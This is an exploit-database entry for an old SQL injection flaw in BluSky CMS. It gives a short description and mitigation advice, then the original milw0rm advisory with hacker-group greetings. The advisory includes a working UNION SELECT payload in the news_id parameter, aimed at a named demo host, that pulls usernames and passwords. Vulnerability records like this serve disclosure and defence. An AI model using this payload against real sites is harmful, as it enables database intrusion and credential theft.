BluSky CMS Remote SQL Injection Vulnerability

vendor:

BluSky CMS

by:

Snakespc

CVSS

HIGH

SQL Injection

CWE

Product Name: BluSky CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

BluSky CMS Remote SQL Injection Vulnerability

BluSky CMS is prone to a remote SQL injection vulnerability. An attacker can exploit this issue to manipulate SQL queries and gain access to sensitive information that may aid in further attacks. This issue affects the 'news_id' parameter in the 'index.php' script when 'news_act' is set to 'read'. An attacker can exploit this issue to gain access to the application's database, potentially compromising the application and any data made available through it.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least-privileged account with the fewest privileges necessary to perform its function.

Source

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
BluSky CMS  Remote SQL Injection Vulnerability
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
Script:BluSky CMS    www.qsix.org
Demo:www.qsix.org/page-3.html
--------------------------SNAKES TEAM------------------------------------
Exploit:
--------
Demo:
http://www.qsix.org/demo/index.php?&news_act=read&news_id=-1+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8+from+demo_users--
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-04]